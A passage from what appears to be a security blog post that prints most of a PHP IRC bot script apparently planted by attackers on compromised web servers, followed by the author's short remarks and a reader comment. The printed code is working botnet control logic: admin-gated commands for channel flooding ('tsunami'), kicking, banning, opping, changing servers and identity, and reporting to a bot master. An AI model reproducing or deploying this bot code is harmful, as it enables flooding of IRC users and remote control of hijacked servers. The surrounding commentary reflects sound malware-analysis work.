  fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);
  }
  elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
  $bhost = $SERVER['HTTPHOST'];
  $bphp = $SERVER['PHPSELF'];
  fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
  }
  elseif ($com[3]==':`up' && $chan) {
  fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL);
  }
  elseif ($com[3]==':`down' && $chan) {
  fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
  }
  elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
  $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
  fputs($fp, 'NICK '.$nicktsu . CRL);
  if (substr($dCommand,0,3)=='433') {
  $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
  fputs($fp, 'NICK '.$nicktsu . CRL);
  }
  $msg = strstr($data,":`tsunami");
  $msg = str_replace(":`tsunami $com[4]","",$msg);
  if (ereg("#", $com[4])) {
  fputs($fp, 'JOIN '.$com[4] . CRL);
  }
  fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
  fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
  fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
  fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
  fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
  fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
  if (ereg("", $com[4])) {
  fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
  fputs($fp, 'NICK '.$nick . CRL);
  } else {
  fputs($fp, 'NICK '.$nick . CRL);
  }
  }
  elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
  $msg = strstr($data,":`cycle");
  if (ereg("", $com[4])) {
  $partchan = $com[4];
  $msg = str_replace(":`cycle $com[4]","",$msg);
  } else {
  $partchan = $chan;
  $msg = str_replace(":`cycle","",$msg);
  }
  if (strlen($msg)<3) {
  $msg = '';
  }
  fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
  fputs($fp, 'JOIN '.$partchan . CRL);
  }
  elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
  $msg = strstr($data,":`part");
  if (ereg("#", $com[4])) {
  $partchan = $com[4];
  $msg = strreplace(":`part $com[4]","",$msg);
  } else {
  $partchan = $chan;
  $msg = str_replace(":`part","",$msg);
  }
  if (strlen($msg)<3) {
  $msg = '';
  }
  fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
  $remchan = strtolower($partchan);
  if (inarray($remchan, $channel)) {
  $channels = str_replace("$remchan ","",$channels);
  unset($channel);
  $channel = explode(" ", $channels);
  }
  foreach ($channel as $v) {
  fputs($fp, 'JOIN '.$v . CRL);
  }
  }
  elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
  if (!ereg("",$com[4])) { $com[4]="".$com[4]; }
  $addchan = strtolower($com[4]);
  if (!in_array($addchan, $channel)) {
  $channel[]=$addchan;
  $channels.="$addchan ";
  }
  foreach ($channel as $v) {
  sleep(rand(1,6));
  fputs($fp, 'JOIN '.$v . CRL);
  }
  }
  elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
  $nick = $com[4];
  $identify = $com[5];
  fputs($fp, 'NICK '.$nick . CRL);
  fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
  }
  elseif ($com[3]==':`k' && $com[4] && $chan) {
  $msg = strstr($data,":`k");
  $msg = str_replace(":`k $com[4]","",$msg);
  fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
  }
  elseif ($com[3]==':`kb' && $com[4] && $chan) {
  $msg = strstr($data,":`kb");
  $msg = str_replace(":`kb $com[4]","",$msg);
  fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
  fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
  }
  elseif ($com[3]==':`ganti') {
  $nick = $nicky[rand(0,count($nicky) - 1)];
  fputs($fp, 'NICK '.$nick . CRL);
  if (substr($dCommand,0,3)=='433') {
  $nick = $nicky[rand(0,count($nicky) - 1)];
  fputs($fp, 'NICK '.$nick . CRL);
  }
  }
  elseif ($com[3]==':`op' && $chan) {
  if ($com[4]) { $opnick = $com[4]; }
  else { $opnick = $dNick; }
  fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
  }
  elseif ($com[3]==':`deop' && $chan) {
  if ($com[4]) { $opnick = $com[4]; }
  else { $opnick = $dNick; }
  fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
  }
  elseif ($com[3]==':`v' && $chan) {
  if ($com[4]) { $vonick = $com[4]; }
  else { $vonick = $dNick; }
  fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
  }
  elseif ($com[3]==':`dv' && $chan) {
  if ($com[4]) { $vonick = $com[4]; }
  else { $vonick = $dNick; }
  fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
  }
  elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
  $msg = strstr($data,":`awaymsg");
  $msg = str_replace(":`awaymsg","",$msg);
  if (strlen($msg)<3) {
  $raway="on";
  fputs($fp,'AWAY : ' . 'AWAY' . CRL);
  } else {
  $raway="off";
  fputs($fp,'AWAY : ' . $msg . CRL);
  }
  }
  elseif ($com[3]==':`mode' && $com[4] && $chan) {
  fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
  }
  elseif ($com[3]==':`nickmode' && $com[4]) {
  $nickmode = $com[4];
  fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
  }
  elseif ($com[3]==':`chanlist') {
  fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
  }
  elseif ($com[3]==':`userlist') {
  $userlist="";
  foreach ($auth as $user) {
  if ($user["pass"]) { $pass="-pass ok"; }
  else { $pass="-no pass"; }
  $userlist .= $user["name"].'('.$user["status"].$pass.') ';
  }
  fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
  }
  elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
  $msg = strstr($data,":`quit");
  $msg = str_replace(":`quit","",$msg);
  if (strlen($msg)>3) {
  $msg = str_replace(" ","",$msg);
  }
  $quit1 = array("ngantor","nguantuk","sama","brb","byeall","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
  $quitmsg = $quit1[rand(0,count($quit1) - 1)];
  fputs($fp, 'QUIT ' . $quitmsg . CRL);
  $keluar = 1;
  exit;
  }
  elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
  if ($com[4]) { $localhost = $com[4]; }
  else { $localhost = 'localhost'; }
  $keluar = 0;
  fputs($fp, 'QUIT ' . CRL);
  }
  elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
  if (!eregi(".dal.net",$com[4])) {
  $remotehost = "irc.dal.net";
  } else { $remotehost = $com[4]; }
  $keluar = 0;
  fputs($fp, 'QUIT changging_server' . CRL);
  }
  elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
  if (!$com[4]) {
  $username = $username;
  } else { $username = $com[4]; }
  $keluar = 0;
  fputs($fp, 'QUIT ganti_ident' . CRL);
  }
  elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
  if (!$com[4]) {
  $realname = "--";
  } else { $realname = $com[4]; }
  $keluar = 0;
  fputs($fp, 'QUIT ganti_fullname' . CRL);
  }
  elseif ($com[3]==':`topic' && $com[4] && $chan) {
  $msg = strstr($data,":`topic");
  $msg = str_replace(":`topic ","",$msg);
  fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
  }
  elseif ($com[3]==':!help' && !$chan) {
  fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
  }
  } else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
  }
  }
  elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
  if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join ",$iText)) {
  if (!ereg("",$dCommand)) {
  if ($log=="on") {
  fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
  }
  $inv = strstr($dFrom,'@');
  foreach ($auth as $user) {
  if ($user["status"]=="user") {
  fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
  }
  }
  }
  }
  elseif (!ereg("#",$dCommand)) {
  if ($log=="on") {
  fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);
  }
  }
  }
  }
  }
  elseif (substr($data,0,4) == 'PING') {
  fputs($fp,'PONG ' . substr($data,5) . CRL);
  $smile = $querym[rand(0,count($querym) - 1)];
  $kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
  $kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
  fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
  }
  }
  }
  fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>
Yes, that’s right Nancy, it’s an IRC bot coded in PHP! Quite nice. It appears to give a conduit to a bot master, probably used to upload and execute new scripts. Fortunately, most sites aren’t vulnerable to this relatively old attack. It is interesting, though, that the attacks are clearly aimed at certain types of software that are apparently perceived as vulnerable by the miscreant that is spreading this gunk.
One comment
Why do think this is “quite nice”?
Leave a Comment:
You must be logged in to post a comment.
Pages
Categories
Tags
-
